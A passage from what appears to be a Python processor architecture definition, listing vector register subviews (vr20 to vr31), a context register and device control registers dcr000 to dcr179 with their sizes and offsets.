Register('vr20_16_5', 2, 0x4344),
Register('vr20_8_11', 1, 0x4344),
Register('vr20_8_10', 1, 0x4345),
Register('vr20_16_4', 2, 0x4346),
Register('vr20_8_9', 1, 0x4346),
Register('vr20_8_8', 1, 0x4347),
Register('vr20_64_0', 8, 0x4348),
Register('vr20_32_1', 4, 0x4348),
Register('vr20_16_3', 2, 0x4348),
Register('vr20_8_7', 1, 0x4348),
Register('vr20_8_6', 1, 0x4349),
Register('vr20_16_2', 2, 0x434a),
Register('vr20_8_5', 1, 0x434a),
Register('vr20_8_4', 1, 0x434b),
Register('vr20_32_0', 4, 0x434c),
Register('vr20_16_1', 2, 0x434c),
Register('vr20_8_3', 1, 0x434c),
Register('vr20_8_2', 1, 0x434d),
Register('vr20_16_0', 2, 0x434e),
Register('vr20_8_1', 1, 0x434e),
Register('vr20_8_0', 1, 0x434f),
Register('vs53', 16, 0x4350),
Register('vr21_64_1', 8, 0x4350),
Register('vr21_32_3', 4, 0x4350),
Register('vr21_16_7', 2, 0x4350),
Register('vr21_8_15', 1, 0x4350),
Register('vr21_8_14', 1, 0x4351),
Register('vr21_16_6', 2, 0x4352),
Register('vr21_8_13', 1, 0x4352),
Register('vr21_8_12', 1, 0x4353),
Register('vr21_32_2', 4, 0x4354),
Register('vr21_16_5', 2, 0x4354),
Register('vr21_8_11', 1, 0x4354),
Register('vr21_8_10', 1, 0x4355),
Register('vr21_16_4', 2, 0x4356),
Register('vr21_8_9', 1, 0x4356),
Register('vr21_8_8', 1, 0x4357),
Register('vr21_64_0', 8, 0x4358),
Register('vr21_32_1', 4, 0x4358),
Register('vr21_16_3', 2, 0x4358),
Register('vr21_8_7', 1, 0x4358),
Register('vr21_8_6', 1, 0x4359),
Register('vr21_16_2', 2, 0x435a),
Register('vr21_8_5', 1, 0x435a),
Register('vr21_8_4', 1, 0x435b),
Register('vr21_32_0', 4, 0x435c),
Register('vr21_16_1', 2, 0x435c),
Register('vr21_8_3', 1, 0x435c),
Register('vr21_8_2', 1, 0x435d),
Register('vr21_16_0', 2, 0x435e),
Register('vr21_8_1', 1, 0x435e),
Register('vr21_8_0', 1, 0x435f),
Register('vs54', 16, 0x4360),
Register('vr22_64_1', 8, 0x4360),
Register('vr22_32_3', 4, 0x4360),
Register('vr22_16_7', 2, 0x4360),
Register('vr22_8_15', 1, 0x4360),
Register('vr22_8_14', 1, 0x4361),
Register('vr22_16_6', 2, 0x4362),
Register('vr22_8_13', 1, 0x4362),
Register('vr22_8_12', 1, 0x4363),
Register('vr22_32_2', 4, 0x4364),
Register('vr22_16_5', 2, 0x4364),
Register('vr22_8_11', 1, 0x4364),
Register('vr22_8_10', 1, 0x4365),
Register('vr22_16_4', 2, 0x4366),
Register('vr22_8_9', 1, 0x4366),
Register('vr22_8_8', 1, 0x4367),
Register('vr22_64_0', 8, 0x4368),
Register('vr22_32_1', 4, 0x4368),
Register('vr22_16_3', 2, 0x4368),
Register('vr22_8_7', 1, 0x4368),
Register('vr22_8_6', 1, 0x4369),
Register('vr22_16_2', 2, 0x436a),
Register('vr22_8_5', 1, 0x436a),
Register('vr22_8_4', 1, 0x436b),
Register('vr22_32_0', 4, 0x436c),
Register('vr22_16_1', 2, 0x436c),
Register('vr22_8_3', 1, 0x436c),
Register('vr22_8_2', 1, 0x436d),
Register('vr22_16_0', 2, 0x436e),
Register('vr22_8_1', 1, 0x436e),
Register('vr22_8_0', 1, 0x436f),
Register('vs55', 16, 0x4370),
Register('vr23_64_1', 8, 0x4370),
Register('vr23_32_3', 4, 0x4370),
Register('vr23_16_7', 2, 0x4370),
Register('vr23_8_15', 1, 0x4370),
Register('vr23_8_14', 1, 0x4371),
Register('vr23_16_6', 2, 0x4372),
Register('vr23_8_13', 1, 0x4372),
Register('vr23_8_12', 1, 0x4373),
Register('vr23_32_2', 4, 0x4374),
Register('vr23_16_5', 2, 0x4374),
Register('vr23_8_11', 1, 0x4374),
Register('vr23_8_10', 1, 0x4375),
Register('vr23_16_4', 2, 0x4376),
Register('vr23_8_9', 1, 0x4376),
Register('vr23_8_8', 1, 0x4377),
Register('vr23_64_0', 8, 0x4378),
Register('vr23_32_1', 4, 0x4378),
Register('vr23_16_3', 2, 0x4378),
Register('vr23_8_7', 1, 0x4378),
Register('vr23_8_6', 1, 0x4379),
Register('vr23_16_2', 2, 0x437a),
Register('vr23_8_5', 1, 0x437a),
Register('vr23_8_4', 1, 0x437b),
Register('vr23_32_0', 4, 0x437c),
Register('vr23_16_1', 2, 0x437c),
Register('vr23_8_3', 1, 0x437c),
Register('vr23_8_2', 1, 0x437d),
Register('vr23_16_0', 2, 0x437e),
Register('vr23_8_1', 1, 0x437e),
Register('vr23_8_0', 1, 0x437f),
Register('vs56', 16, 0x4380),
Register('vr24_64_1', 8, 0x4380),
Register('vr24_32_3', 4, 0x4380),
Register('vr24_16_7', 2, 0x4380),
Register('vr24_8_15', 1, 0x4380),
Register('vr24_8_14', 1, 0x4381),
Register('vr24_16_6', 2, 0x4382),
Register('vr24_8_13', 1, 0x4382),
Register('vr24_8_12', 1, 0x4383),
Register('vr24_32_2', 4, 0x4384),
Register('vr24_16_5', 2, 0x4384),
Register('vr24_8_11', 1, 0x4384),
Register('vr24_8_10', 1, 0x4385),
Register('vr24_16_4', 2, 0x4386),
Register('vr24_8_9', 1, 0x4386),
Register('vr24_8_8', 1, 0x4387),
Register('vr24_64_0', 8, 0x4388),
Register('vr24_32_1', 4, 0x4388),
Register('vr24_16_3', 2, 0x4388),
Register('vr24_8_7', 1, 0x4388),
Register('vr24_8_6', 1, 0x4389),
Register('vr24_16_2', 2, 0x438a),
Register('vr24_8_5', 1, 0x438a),
Register('vr24_8_4', 1, 0x438b),
Register('vr24_32_0', 4, 0x438c),
Register('vr24_16_1', 2, 0x438c),
Register('vr24_8_3', 1, 0x438c),
Register('vr24_8_2', 1, 0x438d),
Register('vr24_16_0', 2, 0x438e),
Register('vr24_8_1', 1, 0x438e),
Register('vr24_8_0', 1, 0x438f),
Register('vs57', 16, 0x4390),
Register('vr25_64_1', 8, 0x4390),
Register('vr25_32_3', 4, 0x4390),
Register('vr25_16_7', 2, 0x4390),
Register('vr25_8_15', 1, 0x4390),
Register('vr25_8_14', 1, 0x4391),
Register('vr25_16_6', 2, 0x4392),
Register('vr25_8_13', 1, 0x4392),
Register('vr25_8_12', 1, 0x4393),
Register('vr25_32_2', 4, 0x4394),
Register('vr25_16_5', 2, 0x4394),
Register('vr25_8_11', 1, 0x4394),
Register('vr25_8_10', 1, 0x4395),
Register('vr25_16_4', 2, 0x4396),
Register('vr25_8_9', 1, 0x4396),
Register('vr25_8_8', 1, 0x4397),
Register('vr25_64_0', 8, 0x4398),
Register('vr25_32_1', 4, 0x4398),
Register('vr25_16_3', 2, 0x4398),
Register('vr25_8_7', 1, 0x4398),
Register('vr25_8_6', 1, 0x4399),
Register('vr25_16_2', 2, 0x439a),
Register('vr25_8_5', 1, 0x439a),
Register('vr25_8_4', 1, 0x439b),
Register('vr25_32_0', 4, 0x439c),
Register('vr25_16_1', 2, 0x439c),
Register('vr25_8_3', 1, 0x439c),
Register('vr25_8_2', 1, 0x439d),
Register('vr25_16_0', 2, 0x439e),
Register('vr25_8_1', 1, 0x439e),
Register('vr25_8_0', 1, 0x439f),
Register('vs58', 16, 0x43a0),
Register('vr26_64_1', 8, 0x43a0),
Register('vr26_32_3', 4, 0x43a0),
Register('vr26_16_7', 2, 0x43a0),
Register('vr26_8_15', 1, 0x43a0),
Register('vr26_8_14', 1, 0x43a1),
Register('vr26_16_6', 2, 0x43a2),
Register('vr26_8_13', 1, 0x43a2),
Register('vr26_8_12', 1, 0x43a3),
Register('vr26_32_2', 4, 0x43a4),
Register('vr26_16_5', 2, 0x43a4),
Register('vr26_8_11', 1, 0x43a4),
Register('vr26_8_10', 1, 0x43a5),
Register('vr26_16_4', 2, 0x43a6),
Register('vr26_8_9', 1, 0x43a6),
Register('vr26_8_8', 1, 0x43a7),
Register('vr26_64_0', 8, 0x43a8),
Register('vr26_32_1', 4, 0x43a8),
Register('vr26_16_3', 2, 0x43a8),
Register('vr26_8_7', 1, 0x43a8),
Register('vr26_8_6', 1, 0x43a9),
Register('vr26_16_2', 2, 0x43aa),
Register('vr26_8_5', 1, 0x43aa),
Register('vr26_8_4', 1, 0x43ab),
Register('vr26_32_0', 4, 0x43ac),
Register('vr26_16_1', 2, 0x43ac),
Register('vr26_8_3', 1, 0x43ac),
Register('vr26_8_2', 1, 0x43ad),
Register('vr26_16_0', 2, 0x43ae),
Register('vr26_8_1', 1, 0x43ae),
Register('vr26_8_0', 1, 0x43af),
Register('vs59', 16, 0x43b0),
Register('vr27_64_1', 8, 0x43b0),
Register('vr27_32_3', 4, 0x43b0),
Register('vr27_16_7', 2, 0x43b0),
Register('vr27_8_15', 1, 0x43b0),
Register('vr27_8_14', 1, 0x43b1),
Register('vr27_16_6', 2, 0x43b2),
Register('vr27_8_13', 1, 0x43b2),
Register('vr27_8_12', 1, 0x43b3),
Register('vr27_32_2', 4, 0x43b4),
Register('vr27_16_5', 2, 0x43b4),
Register('vr27_8_11', 1, 0x43b4),
Register('vr27_8_10', 1, 0x43b5),
Register('vr27_16_4', 2, 0x43b6),
Register('vr27_8_9', 1, 0x43b6),
Register('vr27_8_8', 1, 0x43b7),
Register('vr27_64_0', 8, 0x43b8),
Register('vr27_32_1', 4, 0x43b8),
Register('vr27_16_3', 2, 0x43b8),
Register('vr27_8_7', 1, 0x43b8),
Register('vr27_8_6', 1, 0x43b9),
Register('vr27_16_2', 2, 0x43ba),
Register('vr27_8_5', 1, 0x43ba),
Register('vr27_8_4', 1, 0x43bb),
Register('vr27_32_0', 4, 0x43bc),
Register('vr27_16_1', 2, 0x43bc),
Register('vr27_8_3', 1, 0x43bc),
Register('vr27_8_2', 1, 0x43bd),
Register('vr27_16_0', 2, 0x43be),
Register('vr27_8_1', 1, 0x43be),
Register('vr27_8_0', 1, 0x43bf),
Register('vs60', 16, 0x43c0),
Register('vr28_64_1', 8, 0x43c0),
Register('vr28_32_3', 4, 0x43c0),
Register('vr28_16_7', 2, 0x43c0),
Register('vr28_8_15', 1, 0x43c0),
Register('vr28_8_14', 1, 0x43c1),
Register('vr28_16_6', 2, 0x43c2),
Register('vr28_8_13', 1, 0x43c2),
Register('vr28_8_12', 1, 0x43c3),
Register('vr28_32_2', 4, 0x43c4),
Register('vr28_16_5', 2, 0x43c4),
Register('vr28_8_11', 1, 0x43c4),
Register('vr28_8_10', 1, 0x43c5),
Register('vr28_16_4', 2, 0x43c6),
Register('vr28_8_9', 1, 0x43c6),
Register('vr28_8_8', 1, 0x43c7),
Register('vr28_64_0', 8, 0x43c8),
Register('vr28_32_1', 4, 0x43c8),
Register('vr28_16_3', 2, 0x43c8),
Register('vr28_8_7', 1, 0x43c8),
Register('vr28_8_6', 1, 0x43c9),
Register('vr28_16_2', 2, 0x43ca),
Register('vr28_8_5', 1, 0x43ca),
Register('vr28_8_4', 1, 0x43cb),
Register('vr28_32_0', 4, 0x43cc),
Register('vr28_16_1', 2, 0x43cc),
Register('vr28_8_3', 1, 0x43cc),
Register('vr28_8_2', 1, 0x43cd),
Register('vr28_16_0', 2, 0x43ce),
Register('vr28_8_1', 1, 0x43ce),
Register('vr28_8_0', 1, 0x43cf),
Register('vs61', 16, 0x43d0),
Register('vr29_64_1', 8, 0x43d0),
Register('vr29_32_3', 4, 0x43d0),
Register('vr29_16_7', 2, 0x43d0),
Register('vr29_8_15', 1, 0x43d0),
Register('vr29_8_14', 1, 0x43d1),
Register('vr29_16_6', 2, 0x43d2),
Register('vr29_8_13', 1, 0x43d2),
Register('vr29_8_12', 1, 0x43d3),
Register('vr29_32_2', 4, 0x43d4),
Register('vr29_16_5', 2, 0x43d4),
Register('vr29_8_11', 1, 0x43d4),
Register('vr29_8_10', 1, 0x43d5),
Register('vr29_16_4', 2, 0x43d6),
Register('vr29_8_9', 1, 0x43d6),
Register('vr29_8_8', 1, 0x43d7),
Register('vr29_64_0', 8, 0x43d8),
Register('vr29_32_1', 4, 0x43d8),
Register('vr29_16_3', 2, 0x43d8),
Register('vr29_8_7', 1, 0x43d8),
Register('vr29_8_6', 1, 0x43d9),
Register('vr29_16_2', 2, 0x43da),
Register('vr29_8_5', 1, 0x43da),
Register('vr29_8_4', 1, 0x43db),
Register('vr29_32_0', 4, 0x43dc),
Register('vr29_16_1', 2, 0x43dc),
Register('vr29_8_3', 1, 0x43dc),
Register('vr29_8_2', 1, 0x43dd),
Register('vr29_16_0', 2, 0x43de),
Register('vr29_8_1', 1, 0x43de),
Register('vr29_8_0', 1, 0x43df),
Register('vs62', 16, 0x43e0),
Register('vr30_64_1', 8, 0x43e0),
Register('vr30_32_3', 4, 0x43e0),
Register('vr30_16_7', 2, 0x43e0),
Register('vr30_8_15', 1, 0x43e0),
Register('vr30_8_14', 1, 0x43e1),
Register('vr30_16_6', 2, 0x43e2),
Register('vr30_8_13', 1, 0x43e2),
Register('vr30_8_12', 1, 0x43e3),
Register('vr30_32_2', 4, 0x43e4),
Register('vr30_16_5', 2, 0x43e4),
Register('vr30_8_11', 1, 0x43e4),
Register('vr30_8_10', 1, 0x43e5),
Register('vr30_16_4', 2, 0x43e6),
Register('vr30_8_9', 1, 0x43e6),
Register('vr30_8_8', 1, 0x43e7),
Register('vr30_64_0', 8, 0x43e8),
Register('vr30_32_1', 4, 0x43e8),
Register('vr30_16_3', 2, 0x43e8),
Register('vr30_8_7', 1, 0x43e8),
Register('vr30_8_6', 1, 0x43e9),
Register('vr30_16_2', 2, 0x43ea),
Register('vr30_8_5', 1, 0x43ea),
Register('vr30_8_4', 1, 0x43eb),
Register('vr30_32_0', 4, 0x43ec),
Register('vr30_16_1', 2, 0x43ec),
Register('vr30_8_3', 1, 0x43ec),
Register('vr30_8_2', 1, 0x43ed),
Register('vr30_16_0', 2, 0x43ee),
Register('vr30_8_1', 1, 0x43ee),
Register('vr30_8_0', 1, 0x43ef),
Register('vs63', 16, 0x43f0),
Register('vr31_64_1', 8, 0x43f0),
Register('vr31_32_3', 4, 0x43f0),
Register('vr31_16_7', 2, 0x43f0),
Register('vr31_8_15', 1, 0x43f0),
Register('vr31_8_14', 1, 0x43f1),
Register('vr31_16_6', 2, 0x43f2),
Register('vr31_8_13', 1, 0x43f2),
Register('vr31_8_12', 1, 0x43f3),
Register('vr31_32_2', 4, 0x43f4),
Register('vr31_16_5', 2, 0x43f4),
Register('vr31_8_11', 1, 0x43f4),
Register('vr31_8_10', 1, 0x43f5),
Register('vr31_16_4', 2, 0x43f6),
Register('vr31_8_9', 1, 0x43f6),
Register('vr31_8_8', 1, 0x43f7),
Register('vr31_64_0', 8, 0x43f8),
Register('vr31_32_1', 4, 0x43f8),
Register('vr31_16_3', 2, 0x43f8),
Register('vr31_8_7', 1, 0x43f8),
Register('vr31_8_6', 1, 0x43f9),
Register('vr31_16_2', 2, 0x43fa),
Register('vr31_8_5', 1, 0x43fa),
Register('vr31_8_4', 1, 0x43fb),
Register('vr31_32_0', 4, 0x43fc),
Register('vr31_16_1', 2, 0x43fc),
Register('vr31_8_3', 1, 0x43fc),
Register('vr31_8_2', 1, 0x43fd),
Register('vr31_16_0', 2, 0x43fe),
Register('vr31_8_1', 1, 0x43fe),
Register('vr31_8_0', 1, 0x43ff),
Register('contextreg', 4, 0x6000),
Register('dcr000', 4, 0x7000),
Register('dcr001', 4, 0x7004),
Register('dcr002', 4, 0x7008),
Register('dcr003', 4, 0x700c),
Register('dcr004', 4, 0x7010),
Register('dcr005', 4, 0x7014),
Register('dcr006', 4, 0x7018),
Register('dcr007', 4, 0x701c),
Register('dcr008', 4, 0x7020),
Register('dcr009', 4, 0x7024),
Register('dcr00a', 4, 0x7028),
Register('dcr00b', 4, 0x702c),
Register('dcr00c', 4, 0x7030),
Register('dcr00d', 4, 0x7034),
Register('dcr00e', 4, 0x7038),
Register('dcr00f', 4, 0x703c),
Register('dcr010', 4, 0x7040),
Register('dcr011', 4, 0x7044),
Register('dcr012', 4, 0x7048),
Register('dcr013', 4, 0x704c),
Register('dcr014', 4, 0x7050),
Register('dcr015', 4, 0x7054),
Register('dcr016', 4, 0x7058),
Register('dcr017', 4, 0x705c),
Register('dcr018', 4, 0x7060),
Register('dcr019', 4, 0x7064),
Register('dcr01a', 4, 0x7068),
Register('dcr01b', 4, 0x706c),
Register('dcr01c', 4, 0x7070),
Register('dcr01d', 4, 0x7074),
Register('dcr01e', 4, 0x7078),
Register('dcr01f', 4, 0x707c),
Register('dcr020', 4, 0x7080),
Register('dcr021', 4, 0x7084),
Register('dcr022', 4, 0x7088),
Register('dcr023', 4, 0x708c),
Register('dcr024', 4, 0x7090),
Register('dcr025', 4, 0x7094),
Register('dcr026', 4, 0x7098),
Register('dcr027', 4, 0x709c),
Register('dcr028', 4, 0x70a0),
Register('dcr029', 4, 0x70a4),
Register('dcr02a', 4, 0x70a8),
Register('dcr02b', 4, 0x70ac),
Register('dcr02c', 4, 0x70b0),
Register('dcr02d', 4, 0x70b4),
Register('dcr02e', 4, 0x70b8),
Register('dcr02f', 4, 0x70bc),
Register('dcr030', 4, 0x70c0),
Register('dcr031', 4, 0x70c4),
Register('dcr032', 4, 0x70c8),
Register('dcr033', 4, 0x70cc),
Register('dcr034', 4, 0x70d0),
Register('dcr035', 4, 0x70d4),
Register('dcr036', 4, 0x70d8),
Register('dcr037', 4, 0x70dc),
Register('dcr038', 4, 0x70e0),
Register('dcr039', 4, 0x70e4),
Register('dcr03a', 4, 0x70e8),
Register('dcr03b', 4, 0x70ec),
Register('dcr03c', 4, 0x70f0),
Register('dcr03d', 4, 0x70f4),
Register('dcr03e', 4, 0x70f8),
Register('dcr03f', 4, 0x70fc),
Register('dcr040', 4, 0x7100),
Register('dcr041', 4, 0x7104),
Register('dcr042', 4, 0x7108),
Register('dcr043', 4, 0x710c),
Register('dcr044', 4, 0x7110),
Register('dcr045', 4, 0x7114),
Register('dcr046', 4, 0x7118),
Register('dcr047', 4, 0x711c),
Register('dcr048', 4, 0x7120),
Register('dcr049', 4, 0x7124),
Register('dcr04a', 4, 0x7128),
Register('dcr04b', 4, 0x712c),
Register('dcr04c', 4, 0x7130),
Register('dcr04d', 4, 0x7134),
Register('dcr04e', 4, 0x7138),
Register('dcr04f', 4, 0x713c),
Register('dcr050', 4, 0x7140),
Register('dcr051', 4, 0x7144),
Register('dcr052', 4, 0x7148),
Register('dcr053', 4, 0x714c),
Register('dcr054', 4, 0x7150),
Register('dcr055', 4, 0x7154),
Register('dcr056', 4, 0x7158),
Register('dcr057', 4, 0x715c),
Register('dcr058', 4, 0x7160),
Register('dcr059', 4, 0x7164),
Register('dcr05a', 4, 0x7168),
Register('dcr05b', 4, 0x716c),
Register('dcr05c', 4, 0x7170),
Register('dcr05d', 4, 0x7174),
Register('dcr05e', 4, 0x7178),
Register('dcr05f', 4, 0x717c),
Register('dcr060', 4, 0x7180),
Register('dcr061', 4, 0x7184),
Register('dcr062', 4, 0x7188),
Register('dcr063', 4, 0x718c),
Register('dcr064', 4, 0x7190),
Register('dcr065', 4, 0x7194),
Register('dcr066', 4, 0x7198),
Register('dcr067', 4, 0x719c),
Register('dcr068', 4, 0x71a0),
Register('dcr069', 4, 0x71a4),
Register('dcr06a', 4, 0x71a8),
Register('dcr06b', 4, 0x71ac),
Register('dcr06c', 4, 0x71b0),
Register('dcr06d', 4, 0x71b4),
Register('dcr06e', 4, 0x71b8),
Register('dcr06f', 4, 0x71bc),
Register('dcr070', 4, 0x71c0),
Register('dcr071', 4, 0x71c4),
Register('dcr072', 4, 0x71c8),
Register('dcr073', 4, 0x71cc),
Register('dcr074', 4, 0x71d0),
Register('dcr075', 4, 0x71d4),
Register('dcr076', 4, 0x71d8),
Register('dcr077', 4, 0x71dc),
Register('dcr078', 4, 0x71e0),
Register('dcr079', 4, 0x71e4),
Register('dcr07a', 4, 0x71e8),
Register('dcr07b', 4, 0x71ec),
Register('dcr07c', 4, 0x71f0),
Register('dcr07d', 4, 0x71f4),
Register('dcr07e', 4, 0x71f8),
Register('dcr07f', 4, 0x71fc),
Register('dcr080', 4, 0x7200),
Register('dcr081', 4, 0x7204),
Register('dcr082', 4, 0x7208),
Register('dcr083', 4, 0x720c),
Register('dcr084', 4, 0x7210),
Register('dcr085', 4, 0x7214),
Register('dcr086', 4, 0x7218),
Register('dcr087', 4, 0x721c),
Register('dcr088', 4, 0x7220),
Register('dcr089', 4, 0x7224),
Register('dcr08a', 4, 0x7228),
Register('dcr08b', 4, 0x722c),
Register('dcr08c', 4, 0x7230),
Register('dcr08d', 4, 0x7234),
Register('dcr08e', 4, 0x7238),
Register('dcr08f', 4, 0x723c),
Register('dcr090', 4, 0x7240),
Register('dcr091', 4, 0x7244),
Register('dcr092', 4, 0x7248),
Register('dcr093', 4, 0x724c),
Register('dcr094', 4, 0x7250),
Register('dcr095', 4, 0x7254),
Register('dcr096', 4, 0x7258),
Register('dcr097', 4, 0x725c),
Register('dcr098', 4, 0x7260),
Register('dcr099', 4, 0x7264),
Register('dcr09a', 4, 0x7268),
Register('dcr09b', 4, 0x726c),
Register('dcr09c', 4, 0x7270),
Register('dcr09d', 4, 0x7274),
Register('dcr09e', 4, 0x7278),
Register('dcr09f', 4, 0x727c),
Register('dcr0a0', 4, 0x7280),
Register('dcr0a1', 4, 0x7284),
Register('dcr0a2', 4, 0x7288),
Register('dcr0a3', 4, 0x728c),
Register('dcr0a4', 4, 0x7290),
Register('dcr0a5', 4, 0x7294),
Register('dcr0a6', 4, 0x7298),
Register('dcr0a7', 4, 0x729c),
Register('dcr0a8', 4, 0x72a0),
Register('dcr0a9', 4, 0x72a4),
Register('dcr0aa', 4, 0x72a8),
Register('dcr0ab', 4, 0x72ac),
Register('dcr0ac', 4, 0x72b0),
Register('dcr0ad', 4, 0x72b4),
Register('dcr0ae', 4, 0x72b8),
Register('dcr0af', 4, 0x72bc),
Register('dcr0b0', 4, 0x72c0),
Register('dcr0b1', 4, 0x72c4),
Register('dcr0b2', 4, 0x72c8),
Register('dcr0b3', 4, 0x72cc),
Register('dcr0b4', 4, 0x72d0),
Register('dcr0b5', 4, 0x72d4),
Register('dcr0b6', 4, 0x72d8),
Register('dcr0b7', 4, 0x72dc),
Register('dcr0b8', 4, 0x72e0),
Register('dcr0b9', 4, 0x72e4),
Register('dcr0ba', 4, 0x72e8),
Register('dcr0bb', 4, 0x72ec),
Register('dcr0bc', 4, 0x72f0),
Register('dcr0bd', 4, 0x72f4),
Register('dcr0be', 4, 0x72f8),
Register('dcr0bf', 4, 0x72fc),
Register('dcr0c0', 4, 0x7300),
Register('dcr0c1', 4, 0x7304),
Register('dcr0c2', 4, 0x7308),
Register('dcr0c3', 4, 0x730c),
Register('dcr0c4', 4, 0x7310),
Register('dcr0c5', 4, 0x7314),
Register('dcr0c6', 4, 0x7318),
Register('dcr0c7', 4, 0x731c),
Register('dcr0c8', 4, 0x7320),
Register('dcr0c9', 4, 0x7324),
Register('dcr0ca', 4, 0x7328),
Register('dcr0cb', 4, 0x732c),
Register('dcr0cc', 4, 0x7330),
Register('dcr0cd', 4, 0x7334),
Register('dcr0ce', 4, 0x7338),
Register('dcr0cf', 4, 0x733c),
Register('dcr0d0', 4, 0x7340),
Register('dcr0d1', 4, 0x7344),
Register('dcr0d2', 4, 0x7348),
Register('dcr0d3', 4, 0x734c),
Register('dcr0d4', 4, 0x7350),
Register('dcr0d5', 4, 0x7354),
Register('dcr0d6', 4, 0x7358),
Register('dcr0d7', 4, 0x735c),
Register('dcr0d8', 4, 0x7360),
Register('dcr0d9', 4, 0x7364),
Register('dcr0da', 4, 0x7368),
Register('dcr0db', 4, 0x736c),
Register('dcr0dc', 4, 0x7370),
Register('dcr0dd', 4, 0x7374),
Register('dcr0de', 4, 0x7378),
Register('dcr0df', 4, 0x737c),
Register('dcr0e0', 4, 0x7380),
Register('dcr0e1', 4, 0x7384),
Register('dcr0e2', 4, 0x7388),
Register('dcr0e3', 4, 0x738c),
Register('dcr0e4', 4, 0x7390),
Register('dcr0e5', 4, 0x7394),
Register('dcr0e6', 4, 0x7398),
Register('dcr0e7', 4, 0x739c),
Register('dcr0e8', 4, 0x73a0),
Register('dcr0e9', 4, 0x73a4),
Register('dcr0ea', 4, 0x73a8),
Register('dcr0eb', 4, 0x73ac),
Register('dcr0ec', 4, 0x73b0),
Register('dcr0ed', 4, 0x73b4),
Register('dcr0ee', 4, 0x73b8),
Register('dcr0ef', 4, 0x73bc),
Register('dcr0f0', 4, 0x73c0),
Register('dcr0f1', 4, 0x73c4),
Register('dcr0f2', 4, 0x73c8),
Register('dcr0f3', 4, 0x73cc),
Register('dcr0f4', 4, 0x73d0),
Register('dcr0f5', 4, 0x73d4),
Register('dcr0f6', 4, 0x73d8),
Register('dcr0f7', 4, 0x73dc),
Register('dcr0f8', 4, 0x73e0),
Register('dcr0f9', 4, 0x73e4),
Register('dcr0fa', 4, 0x73e8),
Register('dcr0fb', 4, 0x73ec),
Register('dcr0fc', 4, 0x73f0),
Register('dcr0fd', 4, 0x73f4),
Register('dcr0fe', 4, 0x73f8),
Register('dcr0ff', 4, 0x73fc),
Register('dcr100', 4, 0x7400),
Register('dcr101', 4, 0x7404),
Register('dcr102', 4, 0x7408),
Register('dcr103', 4, 0x740c),
Register('dcr104', 4, 0x7410),
Register('dcr105', 4, 0x7414),
Register('dcr106', 4, 0x7418),
Register('dcr107', 4, 0x741c),
Register('dcr108', 4, 0x7420),
Register('dcr109', 4, 0x7424),
Register('dcr10a', 4, 0x7428),
Register('dcr10b', 4, 0x742c),
Register('dcr10c', 4, 0x7430),
Register('dcr10d', 4, 0x7434),
Register('dcr10e', 4, 0x7438),
Register('dcr10f', 4, 0x743c),
Register('dcr110', 4, 0x7440),
Register('dcr111', 4, 0x7444),
Register('dcr112', 4, 0x7448),
Register('dcr113', 4, 0x744c),
Register('dcr114', 4, 0x7450),
Register('dcr115', 4, 0x7454),
Register('dcr116', 4, 0x7458),
Register('dcr117', 4, 0x745c),
Register('dcr118', 4, 0x7460),
Register('dcr119', 4, 0x7464),
Register('dcr11a', 4, 0x7468),
Register('dcr11b', 4, 0x746c),
Register('dcr11c', 4, 0x7470),
Register('dcr11d', 4, 0x7474),
Register('dcr11e', 4, 0x7478),
Register('dcr11f', 4, 0x747c),
Register('dcr120', 4, 0x7480),
Register('dcr121', 4, 0x7484),
Register('dcr122', 4, 0x7488),
Register('dcr123', 4, 0x748c),
Register('dcr124', 4, 0x7490),
Register('dcr125', 4, 0x7494),
Register('dcr126', 4, 0x7498),
Register('dcr127', 4, 0x749c),
Register('dcr128', 4, 0x74a0),
Register('dcr129', 4, 0x74a4),
Register('dcr12a', 4, 0x74a8),
Register('dcr12b', 4, 0x74ac),
Register('dcr12c', 4, 0x74b0),
Register('dcr12d', 4, 0x74b4),
Register('dcr12e', 4, 0x74b8),
Register('dcr12f', 4, 0x74bc),
Register('dcr130', 4, 0x74c0),
Register('dcr131', 4, 0x74c4),
Register('dcr132', 4, 0x74c8),
Register('dcr133', 4, 0x74cc),
Register('dcr134', 4, 0x74d0),
Register('dcr135', 4, 0x74d4),
Register('dcr136', 4, 0x74d8),
Register('dcr137', 4, 0x74dc),
Register('dcr138', 4, 0x74e0),
Register('dcr139', 4, 0x74e4),
Register('dcr13a', 4, 0x74e8),
Register('dcr13b', 4, 0x74ec),
Register('dcr13c', 4, 0x74f0),
Register('dcr13d', 4, 0x74f4),
Register('dcr13e', 4, 0x74f8),
Register('dcr13f', 4, 0x74fc),
Register('dcr140', 4, 0x7500),
Register('dcr141', 4, 0x7504),
Register('dcr142', 4, 0x7508),
Register('dcr143', 4, 0x750c),
Register('dcr144', 4, 0x7510),
Register('dcr145', 4, 0x7514),
Register('dcr146', 4, 0x7518),
Register('dcr147', 4, 0x751c),
Register('dcr148', 4, 0x7520),
Register('dcr149', 4, 0x7524),
Register('dcr14a', 4, 0x7528),
Register('dcr14b', 4, 0x752c),
Register('dcr14c', 4, 0x7530),
Register('dcr14d', 4, 0x7534),
Register('dcr14e', 4, 0x7538),
Register('dcr14f', 4, 0x753c),
Register('dcr150', 4, 0x7540),
Register('dcr151', 4, 0x7544),
Register('dcr152', 4, 0x7548),
Register('dcr153', 4, 0x754c),
Register('dcr154', 4, 0x7550),
Register('dcr155', 4, 0x7554),
Register('dcr156', 4, 0x7558),
Register('dcr157', 4, 0x755c),
Register('dcr158', 4, 0x7560),
Register('dcr159', 4, 0x7564),
Register('dcr15a', 4, 0x7568),
Register('dcr15b', 4, 0x756c),
Register('dcr15c', 4, 0x7570),
Register('dcr15d', 4, 0x7574),
Register('dcr15e', 4, 0x7578),
Register('dcr15f', 4, 0x757c),
Register('dcr160', 4, 0x7580),
Register('dcr161', 4, 0x7584),
Register('dcr162', 4, 0x7588),
Register('dcr163', 4, 0x758c),
Register('dcr164', 4, 0x7590),
Register('dcr165', 4, 0x7594),
Register('dcr166', 4, 0x7598),
Register('dcr167', 4, 0x759c),
Register('dcr168', 4, 0x75a0),
Register('dcr169', 4, 0x75a4),
Register('dcr16a', 4, 0x75a8),
Register('dcr16b', 4, 0x75ac),
Register('dcr16c', 4, 0x75b0),
Register('dcr16d', 4, 0x75b4),
Register('dcr16e', 4, 0x75b8),
Register('dcr16f', 4, 0x75bc),
Register('dcr170', 4, 0x75c0),
Register('dcr171', 4, 0x75c4),
Register('dcr172', 4, 0x75c8),
Register('dcr173', 4, 0x75cc),
Register('dcr174', 4, 0x75d0),
Register('dcr175', 4, 0x75d4),
Register('dcr176', 4, 0x75d8),
Register('dcr177', 4, 0x75dc),
Register('dcr178', 4, 0x75e0),
Register('dcr179', 4, 0x75e4),
